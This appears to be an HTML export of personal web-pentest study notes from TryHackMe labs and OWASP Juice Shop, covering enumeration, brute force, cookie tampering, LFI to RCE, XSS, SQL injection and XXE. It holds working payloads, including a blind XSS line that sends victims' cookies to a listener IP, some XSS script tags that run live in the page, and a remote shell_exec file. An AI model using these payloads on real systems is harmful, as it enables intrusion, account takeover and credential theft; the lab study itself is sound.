
    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Web Pentest</title>
        <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet">
        <link href="https://cdn.jsdelivr.net/npm/lightgallery.js/dist/css/lightgallery.min.css" rel="stylesheet">
        <link href="https://cdn.jsdelivr.net/npm/lg-thumbnail.js/dist/lg-thumbnail.min.css" rel="stylesheet">
        <!-- Add Pygments CSS for code highlighting -->
        <style>pre { line-height: 125%; }
td.linenos .normal { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
span.linenos { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
.highlight .hll { background-color: #ffffcc }
.highlight { background: #f8f8f8; }
.highlight .c { color: #3D7B7B; font-style: italic } /* Comment */
.highlight .err { border: 1px solid #FF0000 } /* Error */
.highlight .k { color: #008000; font-weight: bold } /* Keyword */
.highlight .o { color: #666666 } /* Operator */
.highlight .ch { color: #3D7B7B; font-style: italic } /* Comment.Hashbang */
.highlight .cm { color: #3D7B7B; font-style: italic } /* Comment.Multiline */
.highlight .cp { color: #9C6500 } /* Comment.Preproc */
.highlight .cpf { color: #3D7B7B; font-style: italic } /* Comment.PreprocFile */
.highlight .c1 { color: #3D7B7B; font-style: italic } /* Comment.Single */
.highlight .cs { color: #3D7B7B; font-style: italic } /* Comment.Special */
.highlight .gd { color: #A00000 } /* Generic.Deleted */
.highlight .ge { font-style: italic } /* Generic.Emph */
.highlight .gr { color: #E40000 } /* Generic.Error */
.highlight .gh { color: #000080; font-weight: bold } /* Generic.Heading */
.highlight .gi { color: #008400 } /* Generic.Inserted */
.highlight .go { color: #717171 } /* Generic.Output */
.highlight .gp { color: #000080; font-weight: bold } /* Generic.Prompt */
.highlight .gs { font-weight: bold } /* Generic.Strong */
.highlight .gu { color: #800080; font-weight: bold } /* Generic.Subheading */
.highlight .gt { color: #0044DD } /* Generic.Traceback */
.highlight .kc { color: #008000; font-weight: bold } /* Keyword.Constant */
.highlight .kd { color: #008000; font-weight: bold } /* Keyword.Declaration */
.highlight .kn { color: #008000; font-weight: bold } /* Keyword.Namespace */
.highlight .kp { color: #008000 } /* Keyword.Pseudo */
.highlight .kr { color: #008000; font-weight: bold } /* Keyword.Reserved */
.highlight .kt { color: #B00040 } /* Keyword.Type */
.highlight .m { color: #666666 } /* Literal.Number */
.highlight .s { color: #BA2121 } /* Literal.String */
.highlight .na { color: #687822 } /* Name.Attribute */
.highlight .nb { color: #008000 } /* Name.Builtin */
.highlight .nc { color: #0000FF; font-weight: bold } /* Name.Class */
.highlight .no { color: #880000 } /* Name.Constant */
.highlight .nd { color: #AA22FF } /* Name.Decorator */
.highlight .ni { color: #717171; font-weight: bold } /* Name.Entity */
.highlight .ne { color: #CB3F38; font-weight: bold } /* Name.Exception */
.highlight .nf { color: #0000FF } /* Name.Function */
.highlight .nl { color: #767600 } /* Name.Label */
.highlight .nn { color: #0000FF; font-weight: bold } /* Name.Namespace */
.highlight .nt { color: #008000; font-weight: bold } /* Name.Tag */
.highlight .nv { color: #19177C } /* Name.Variable */
.highlight .ow { color: #AA22FF; font-weight: bold } /* Operator.Word */
.highlight .w { color: #bbbbbb } /* Text.Whitespace */
.highlight .mb { color: #666666 } /* Literal.Number.Bin */
.highlight .mf { color: #666666 } /* Literal.Number.Float */
.highlight .mh { color: #666666 } /* Literal.Number.Hex */
.highlight .mi { color: #666666 } /* Literal.Number.Integer */
.highlight .mo { color: #666666 } /* Literal.Number.Oct */
.highlight .sa { color: #BA2121 } /* Literal.String.Affix */
.highlight .sb { color: #BA2121 } /* Literal.String.Backtick */
.highlight .sc { color: #BA2121 } /* Literal.String.Char */
.highlight .dl { color: #BA2121 } /* Literal.String.Delimiter */
.highlight .sd { color: #BA2121; font-style: italic } /* Literal.String.Doc */
.highlight .s2 { color: #BA2121 } /* Literal.String.Double */
.highlight .se { color: #AA5D1F; font-weight: bold } /* Literal.String.Escape */
.highlight .sh { color: #BA2121 } /* Literal.String.Heredoc */
.highlight .si { color: #A45A77; font-weight: bold } /* Literal.String.Interpol */
.highlight .sx { color: #008000 } /* Literal.String.Other */
.highlight .sr { color: #A45A77 } /* Literal.String.Regex */
.highlight .s1 { color: #BA2121 } /* Literal.String.Single */
.highlight .ss { color: #19177C } /* Literal.String.Symbol */
.highlight .bp { color: #008000 } /* Name.Builtin.Pseudo */
.highlight .fm { color: #0000FF } /* Name.Function.Magic */
.highlight .vc { color: #19177C } /* Name.Variable.Class */
.highlight .vg { color: #19177C } /* Name.Variable.Global */
.highlight .vi { color: #19177C } /* Name.Variable.Instance */
.highlight .vm { color: #19177C } /* Name.Variable.Magic */
.highlight .il { color: #666666 } /* Literal.Number.Integer.Long */</style>
        <style>
            /* Center the HTML file on the screen */
            body {
                display: flex;
                justify-content: center;
                align-items: center;
                height: 100vh;
                padding-top: 30px;
            }
            /* Make the display width of the HTML file smaller */
            .container {
                max-width: 42vw;
                margin: 0 auto;
                height: 100%
            }
            
            img {
                width: 80%;
            }
        </style>
        <script src="https://cdn.jsdelivr.net/npm/lightgallery.js/dist/js/lightgallery.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-thumbnail.js/dist/lg-thumbnail.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-zoom.js/dist/lg-zoom.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-fullscreen.js/dist/lg-fullscreen.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-share.js/dist/lg-share.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-autoplay.js/dist/lg-autoplay.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-rotate.js/dist/lg-rotate.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-flip.js/dist/lg-flip.min.js"></script>
        <script>
            window.onload = function() {
                const images = document.getElementsByTagName('img');
                const lightGalleryItems = [];
                for (let i = 0; i < images.length; i++) {
                    const img = images[i];
                    if (img.naturalWidth > 1000) {
                        if (window.innerWidth > 768) {
                            img.style.width = '110%';
                            img.style.transform = 'translateX(-4%)';
                        } else {
                            img.style.width = '100%';
                            img.style.transform = 'none';
                        }
                    }
                    lightGalleryItems.push({ src: img.src, thumb: img.src });
                    img.setAttribute('data-lg-idx', i);
                    img.addEventListener('click', function() {
                        lightGallery(img, {
                            dynamic: true,
                            dynamicEl: lightGalleryItems,
                            index: parseInt(img.getAttribute('data-lg-idx'))
                        });
                    });
                }
            };
        </script>
    </head>
    <body>
        <div class="container">
            <div class="row">
                <div class="col">
                    <h1 style="text-align:center; text-transform:uppercase; font-family: 'Playfair Display', serif; font-weight:700;"">Web basic</h1>

<p>19 Tháng Bảy 2022</p>
<p>6:52 SA</p>
<p>SUB DOMAIN ENUM:</p>
<p>Google enum:</p>
<p>-site:www.tryhackme.com  site:*.tryhackme.com</p>
<p>Osint ssl:</p>
<p>Go to  and search for the domain name tryhackme.com</p>
<p>DNS bruteforce:</p>
<p>dnsrecon -t brt -d acmeitsupport.thm</p>
<p>./sublist3r.py -d acmeitsupport.thm</p>
<p>FUZZ VIRTUAL HOST</p>
<p>ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u</p>
<p>Nếu trả về nhiều kết quả có size 2395 byte thì có thể dùng -fs để loại bớt các kết quả có size 2395</p>
<p>ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u  -fs 2395</p>
<p>Authentication Bypass</p>
<p>Enum User:</p>
<p>user@tryhackme$ ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&amp;email=x&amp;password=x&amp;cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u  -mr "username already exists" &gt; valid_usernames.txt</p>
<p>bruteforce:</p>
<p>ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&amp;password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u  -fc 200</p>
<p>Logic flaws:</p>
<p>Let's illustrate this by using the curl tool to manually make the request to the webserver.</p>
<p>curl '' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert'</p>
<p>The PHP $_REQUEST variable is an array that contains data received from the query string and POST data. If the same key name is used for both the query string and POST data, the application logic for this variable favours POST data fields rather than the query string, so if we add another parameter to the POST form, we can control where the password reset email gets delivered.</p>
<p>curl '' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&amp;email=attacker@hacker.com'</p>
<p>curl '' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&amp;email={username}@customer.acmeitsupport.thm'</p>
<p>cookie tampering</p>
<p>curl</p>
<p>We can see we are returned a message of: Not Logged In</p>
<p>curl -H "Cookie: logged_in=true; admin=false"</p>
<p>We are given the message: Logged In As A User</p>
<p>curl -H "Cookie: logged_in=true; admin=true"</p>
<p>This returns the result: Logged In As An Admin</p>
<p>Set-Cookie: session=eyJpZCI6MSwiYWRtaW4iOmZhbHNlfQ==; Max-Age=3600; Path=/</p>
<p>This string base64 decoded has the value of {"id":1,"admin": false}</p>
<p>IDOR</p>
<p>cookie tampering</p>
<p>curl</p>
<p>We can see we are returned a message of: Not Logged In</p>
<p>FILE CONLUSION</p>
<p>10.10.86.86/lab4.php?file=../../../../etc/passwd</p>
<p>bypass filter keyword using null byte:</p>
<p>10.10.86.86/lab4.php?file=/etc/passwd%00</p>
<p>10.10.86.86/lab4.php?file=/etc/passwd/.</p>
<p>bypass filter php with base64,rot13 encode:</p>
<p>user@machine$ echo "AoC3 is fun!" | base64 QW9DMyBpcyBmdW4hCg==</p>
<p>If Access Denied! Allowed files at THM-profile folder only!</p>
<p>LFI to rce:</p>
<p>host.php : &lt;?php echo shell_exec('hostname'); ?&gt;</p>
<p>10.10.133.77/playground.php?file=http://10.17.30.3/host.php</p>
<p>XSS</p>
<p>LEVEL 1 : You just need to alert() the keyword THM :</p>
<script>alert('THM');</script>

<p>LEVEL 2 : You need to escape <h2>Hello, <input value="johny"></h2></p>
<p>"&gt;<script>alert('THM');</script></p>
<p>LEVEL 3 : You need to escape <h2>Hello, <textarea>meee</textarea></h2></p>
<p></textarea><script>alert('THM');</script></p>
<p>LEVEL 4 : You need to escape a call from a script document.getElementsByClassName('name')[0].innerHTML='hey you';</p>
<p>';alert('THM');//</p>
<p>LEVEL 5 : A filter is applied and remove keywords like "script"</p>
<p><sscriptcript>alert('THM');</sscriptcript></p>
<p>LEVEL 6 : You need to put script on image <img src="/images/cat.jpg"></p>
<p>/images/cat.jpg" onload="alert('THM');</p>
<p>Answer : THM{XSS_MASTER}</p>
<p>BLIND XSS ( TICKET):</p>
<p>Launch a listener on the KALI machine :</p>
<p>nc -lnvp 9001</p>
<p>Then create a new ticket with the payload :</p>
<p></textarea><script>fetch('http://10.10.127.52:9001?cookie=' + btoa(document.cookie) );</script></p>
<p>Web Enumeration</p>
<p>Friday, July 29, 2022</p>
<p>8:48 PM</p>
<p>Gobuster</p>
<p>gobuster dir -u   -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt   -x html,css,js,txt,conf -t64</p>
<p>-u: url</p>
<p>-w: wordlist</p>
<p>-t: threads</p>
<p>-x: extentions</p>
<p>Enumerating for Installed Themes</p>
<p>wpscan --url  --enumerate t</p>
<p>Enumerating for Installed Plugins</p>
<p>wpscan --url  --enumerate p</p>
<p>Enumerating for Users</p>
<p>wpscan --url  --enumerate u</p>
<p>The "Vulnerable" Flag</p>
<p>wpscan --url  --enumerate vp</p>
<p>Performing a Password Attack</p>
<p>wpscan --url   --passwords /usr/share/wordlists/rockyou.txt --usernames Phreakazoid</p>
<p>Adjusting WPScan's Aggressiveness (WAF)</p>
<p>--plugins-detection aggressive</p>
<p>--plugins-detection passive</p>
<p>NIKTO</p>
<p>By scanning the site with nmap and then piping it to nikto we can find and scan the other site.</p>
<p>nmap --top-ports 1000 10.10.64.208 -oG - | nikto -h</p>
<p>We can run add in the -Display 2 option and get the cookie for the JBoss server:</p>
<p>nikto -h 10.10.64.208 -p 8080 -Display 2</p>
<p>SQL INJECTION</p>
<p>19 Tháng Bảy 2022</p>
<p>6:52 SA</p>
<p>sql injection:</p>
<p>" OR 1=1 SELECT * FROM Users WHERE Name ="" OR 1=1 AND Pass ="" OR 1=1</p>
<p>SQL Injection Based on Batched SQL Statements:</p>
<p>SELECT * FROM Users; DROP TABLE Suppliers userid = getRequestString(“userID”); sql = “SELECT * FROM Users WHERE UserId =” + userid;</p>
<p>input: 2018; DROP TABLE Suppliers;</p>
<p>SELECT * FROM Users WHERE UserId = 2018; DROP TABLE Suppliers;</p>
<p>Reflected XSS:</p>
<p>In-Band SQLi</p>
<p>Check if there is a sqli vuln</p>
<p>' or "</p>
<p>check how many columns are returned</p>
<p>1 UNION SELECT 1</p>
<p>0 UNION SELECT 1,2,3</p>
<p>get the database name</p>
<p>0 UNION SELECT 1,2,database()</p>
<p>get the tables in the database</p>
<p>0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one'</p>
<p>get the column informations in the target table</p>
<p>0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'staff_users'</p>
<p>get the content of the table</p>
<p>0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users</p>
<p>Blind SQLi</p>
<p>Bypass login</p>
<p>' OR 1=1;--</p>
<p>Which turns the SQL query into the following:</p>
<p>select * from users where username='' and password='' OR 1=1;</p>
<p>Boolean Blind SQLi</p>
<p>As the web application has responded with the value taken as false, we can confirm this is the incorrect value of columns. Keep on adding more columns until we have a taken value of true. You can confirm that the answer is three columns by setting the username to the below value:</p>
<p>admin123' UNION SELECT 1,2,3;--</p>
<p>Now that our number of columns has been established, we can work on the enumeration of the database. Our first task is discovering the database name. We can do this by using the built-in database() method and then using the like operator to try and find results that will return a true status.</p>
<p>Try the below username value and see what happens:</p>
<p>admin123' UNION SELECT 1,2,3 where database() like '%';--</p>
<p>We get a true response because, in the like operator, we just have the value of %, which will match anything as it's the wildcard value. If we change the wildcard operator to a%, you'll see the response goes back to false, which confirms that the database name does not begin with the letter a. We can cycle through all the letters, numbers and characters such as - and _ until we discover a match. If you send the below as the username value, you'll receive a true response that confirms the database name begins with the letter s.</p>
<p>admin123' UNION SELECT 1,2,3 where database() like 's%';--</p>
<p>Now you move onto the next character of the database name until you find another true response, for example, 'sa%', 'sb%', 'sc%' etc. Keep on with this process until you discover all the characters of the database name, which is sqli_three.</p>
<p>We've established the database name, which we can now use to enumerate table names using a similar method by utilising the information_schema database. Try setting the username to the following value:</p>
<p>admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name like 'a%';--</p>
<p>This query looks for results in the information_schema database in the tables table where the database name matches sqli_three, and the table name begins with the letter a. As the above query results in a false response, we can confirm that there are no tables in the sqli_three database that begin with the letter a. Like previously, you'll need to cycle through letters, numbers and characters until you find a positive match.</p>
<p>You'll finally end up discovering a table in the sqli_three database named users, which you can be confirmed by running the following username payload:</p>
<p>admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name='users';--</p>
<p>Lastly, we now need to enumerate the column names in the users table so we can properly search it for login credentials. Again using the information_schema database and the information we've already gained, we can start querying it for column names. Using the payload below, we search the columns table where the database is equal to sqli_three, the table name is users, and the column name begins with the letter a.</p>
<p>admin123' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_three' and TABLE_NAME='users' and COLUMN_NAME like 'a%';</p>
<p>Again you'll need to cycle through letters, numbers and characters until you find a match. As you're looking for multiple results, you'll have to add this to your payload each time you find a new column name, so you don't keep discovering the same one. For example, once you've found the column named id, you'll append that to your original payload (as seen below).</p>
<p>admin123' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_three' and TABLE_NAME='users' and COLUMN_NAME like 'a%' and COLUMN_NAME !='id';</p>
<p>Repeating this process three times will enable you to discover the columns id, username and password. Which now you can use to query the users table for login credentials. First, you'll need to discover a valid username which you can use the payload below:</p>
<p>admin123' UNION SELECT 1,2,3 from users where username like 'a%</p>
<p>Which, once you've cycled through all the characters, you will confirm the existence of the username admin. Now you've got the username. You can concentrate on discovering the password. The payload below shows you how to find the password:</p>
<p>admin123' UNION SELECT 1,2,3 from users where username='admin' and password like 'a%</p>
<p>Cycling through all the characters, you'll discover the password is 3845.</p>
<p>Find a boolean-like api that takes parameters. Ensure the endpoint answers with false (no record from db returned). Now change the parameters so that your question results in a positive record from the database.</p>
<p>admin123' union select 1,2,3 where database() like 'sqli_three%';-- ... over ... admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name like 'a%';-- ... till ... admin123' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_three' and TABLE_NAME='users' and COLUMN_NAME like 'a%' and COLUMN_NAME !='id';</p>
<p>Every little step must be sent to seperately which is very tidious, but still effective.</p>
<p>This way a user can be enumerated and his password can be found (wordlists).</p>
<p>Timebased Blind SQLi</p>
<p>In case you don't even have a value-based indicator, you can utilize the time delay of a query. This is done by actually doing quite the same as for the Boolean Blind SQLi but you use sleep(1) to delay the result. The sleep(1) is only executed if the result of the query has an record because sleep(1) is like a function that is executed on the column values.</p>
<p>admin123' UNION SELECT SLEEP(1),2 FROM information_schema.tables WHERE table_schema = 'sqli_four' and table_name like 'users%';--</p>
<p>admin123' UNION SELECT SLEEP(5),2 from users where username like ‘admin’ and password like ‘4961’;</p>
<p>Juice-shop</p>
<p>Saturday, July 30, 2022</p>
<p>11:30 PM</p>
<p>SQLI</p>
<p>Nhập login:</p>
<p>da'or 1=1;--</p>
<p><img alt="" src="../media/Web%20Pentest_1.png" /></p>
<p>XXE</p>
<p>Go to</p>
<p>Upload file xml with content:</p>
<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [

<!ELEMENT foo ANY >

<!--ENTITY xxe SYSTEM "" -->
<p>]&gt;<foo></foo></p>
<p>Capture with burpsuite:</p>
<p><img alt="" src="../media/Web%20Pentest_2.png" /></p>
<p>Sensitive Data Exposure</p>
<p>Tuesday, August 2, 2022</p>
<p>9:56 PM</p>
<p>Checck header:</p>
<p>Check ssl strong:</p>
<p>$ nmap --script ssl-enum-ciphers -p 443 jumpnowtek.com</p>
<p>Starting Nmap 7.80SVN (  ) at 2019-12-03 15:50 EST</p>
<p>Nmap scan report for jumpnowtek.com (166.78.186.4)</p>
<p>Host is up (0.075s latency).</p>
<p>PORT    STATE SERVICE</p>
<p>443/tcp open  https</p>
<p>| ssl-enum-ciphers:</p>
<p>|   TLSv1.0:</p>
<p>|     ciphers:</p>
<p>|       TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (ecdh_x25519) - A</p>
<p>|       TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (ecdh_x25519) - A</p>
<p>|       TLS_DHE_RSA_WITH_AES_128_CBC_SHA (dh 2048) - A</p>
<p>|       TLS_DHE_RSA_WITH_AES_256_CBC_SHA (dh 2048) - A</p>
<p>|       TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A</p>
<p>|       TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A</p>
<p>|     compressors:</p>
<p>|       NULL</p>
<p>|     cipher preference: server</p>
<p>|   TLSv1.1:</p>
<p>|     ciphers:</p>
<p>|       TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (ecdh_x25519) - A</p>
<p>|       TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (ecdh_x25519) - A</p>
<p>|       TLS_DHE_RSA_WITH_AES_128_CBC_SHA (dh 2048) - A</p>
<p>|       TLS_DHE_RSA_WITH_AES_256_CBC_SHA (dh 2048) - A</p>
<p>|       TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A</p>
<p>|       TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A</p>
<p>|     compressors:</p>
<p>|       NULL</p>
<p>|     cipher preference: server</p>
<p>|   TLSv1.2:</p>
<p>|     ciphers:</p>
<p>|       TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256 (ecdh_x25519) - A</p>
<p>|       TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (ecdh_x25519) - A</p>
<p>|       TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (ecdh_x25519) - A</p>
<p>|       TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 (dh 2048) - A</p>
<p>|       TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 (dh 2048) - A</p>
<p>|       TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 (ecdh_x25519) - A</p>
<p>|       TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (ecdh_x25519) - A</p>
<p>|       TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (ecdh_x25519) - A</p>
<p>|       TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (ecdh_x25519) - A</p>
<p>|       TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 (dh 2048) - A</p>
<p>|       TLS_DHE_RSA_WITH_AES_128_CBC_SHA (dh 2048) - A</p>
<p>|       TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 (dh 2048) - A</p>
<p>|       TLS_DHE_RSA_WITH_AES_256_CBC_SHA (dh 2048) - A</p>
<p>|       TLS_RSA_WITH_AES_128_GCM_SHA256 (rsa 2048) - A</p>
<p>|       TLS_RSA_WITH_AES_256_GCM_SHA384 (rsa 2048) - A</p>
<p>|       TLS_RSA_WITH_AES_128_CBC_SHA256 (rsa 2048) - A</p>
<p>|       TLS_RSA_WITH_AES_256_CBC_SHA256 (rsa 2048) - A</p>
<p>|       TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A</p>
<p>|       TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A</p>
<p>|     compressors:</p>
<p>|       NULL</p>
<p>|     cipher preference: server</p>
<p>|_  least strength: A</p>
<p>Nmap done: 1 IP address (1 host up) scanned in 8.27 seconds</p>
<p>See the manual for the meaning of the ratings, but A is good.</p>
<p>Note: If rating F: can attack by MITM</p>
<p>You can also use Nmap scripts to look for well-known ssl and tls vulnerabilities</p>
<p>ssl-ccs-injection: Connection setup bugs allowing for MITM attacks (ccs-injection-vuln, ccs-injection-primer)</p>
<p>ssl-cert-intaddr: Leaking of internal IP addresses</p>
<p>ssl-date: Leaking of remote server time</p>
<p>ssl-dh-params: Use of weak Diffie-Hellman parameters</p>
<p>ssl-heartbleed: Vulnerable to OpenSSL Heartbleed</p>
<p>ssl-known-key: Server is using a known bad certificate</p>
<p>ssl-poodle: Server allows vulnerable SSLv3 CBC ciphers (POODLE)</p>
<p>sslv2: Server allows obsolete SSLv2 ciphers</p>
<p>sslv2-drown: Server allows SSLv2 ciphers associated with DROWN attacks</p>
<p>Ftp expose file,folder</p>
<p>&xxe;</p>
                </div>
            </div>
        </div>    
    </body>
    </html>
    <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
<style>

.copy-button {
  position: absolute;
  right: 5px ;
  top: 5px;
  border: transparent;
  background-color: transparent;
  padding: 2px 6px;
  cursor: pointer;
  font-size: 14px;
  color: #333;
  border-radius: 8px;

}

.copy-button:hover {
  background-color: #30363d; # Change this to a different color to create a hover effect
}
.material-icons{
  line-height:1.3;
  color: #7d8590;
}

pre {
  position: relative;
  # padding: 20px;
  border: 1px solid #e7ee7;
  overflow-x: auto; # Remove this line to disable horizontal scrolling
  font-size: 14px;
  line-height: 1.5;
  border-radius: 6px;
  margin-bottom: 20px;

  # Add these lines to set a fixed width for the code block and wrap long lines
  #width: 80%;
  white-space: pre-wrap; 
}

pre code {
  display: block;
  border-radius: 8px;
  background-color: #2d2d2d; # Change this to a different color to match the copy button background

}




@media only screen and (min-width: 280px) {
  img {
    width: 85%; /* Make image smaller on tablets and mobiles */
  }
}

@media only screen and (max-width: 768px) {
  img {
    width: 85%; /* Make image smaller on tablets and desktops */
  }
}

# @media (min-width: 576px) {
#   img {
#     max-width: 540px;
#   }
# }

# @media (min-width: 768px) {
#   img {
#     max-width: 720px;
#   }
# }



@media (min-width: 280px) {
  .container {
    max-width: 90%;
    margin: 0 auto;
    height: 100%;
  }
}

@media (min-width: 750px) {
  .container {
    max-width: 80%;
    margin: 0 auto;
    height: 100%;
  }
}



@media (min-width: 912px) {
  .container {
    max-width: 70%;
    margin: 0 auto;
    height: 100%;
  }
}

# @media (min-width: 1200px) {
#   .container {
#     max-width: 70%;
#     margin: 0 auto;
#     height: 100%;
#   }
# }

# @media (min-width: 576px) {
#   .container {
#     max-width: 540px;
#   }
# }

# @media (min-width: 768px) {
#   .container {
#     max-width: 620px;
#     margin: 0;
#   }
# }

# @media (min-width: 992px) {
#   .container {
#     max-width: 760px;
#   }
# }

@media (min-width: 1200px) {
  .container {
    max-width: 735px;
    margin: 0;
    height: 100%;
  }
}

# p { 
#   text-indent: 10px;
# }

h2 {
  font-size: 1.5rem;
}

h3 {
  font-size: 1.3rem;
}

# .container {
#   max-width: 100%; /* Set the container width to 100% */
#   padding-left: 15px; /* Add some padding to the left */
#   padding-right: 15px; /* Add some padding to the right */
# }


</style>
<script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/10.7.2/highlight.min.js"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.8.0/styles/atom-one-dark-reasonable.min.css">

<script>
  document.addEventListener('DOMContentLoaded', function() {
    var codeBlocks = document.querySelectorAll('pre code');
    codeBlocks.forEach(function(codeBlock) {
      var copyButton = document.createElement('button');
      copyButton.innerHTML = '<i class="material-icons">content_copy</i>';
      copyButton.classList.add('copy-button');
      codeBlock.parentNode.insertBefore(copyButton, codeBlock);

      copyButton.addEventListener('click', function() {
        var code = codeBlock.textContent;
        var textarea = document.createElement('textarea');
        textarea.textContent = code;
        document.body.appendChild(textarea);
        textarea.select();
        document.execCommand('copy');
        textarea.remove();
        copyButton.innerHTML = '<i class="material-icons">check</i>';
        setTimeout(function() {
          copyButton.innerHTML = '<i class="material-icons">content_copy</i>';
        }, 2000);
      });
    });

    // Initialize highlight.js for syntax highlighting
    hljs.initHighlightingOnLoad();
  });
</script>
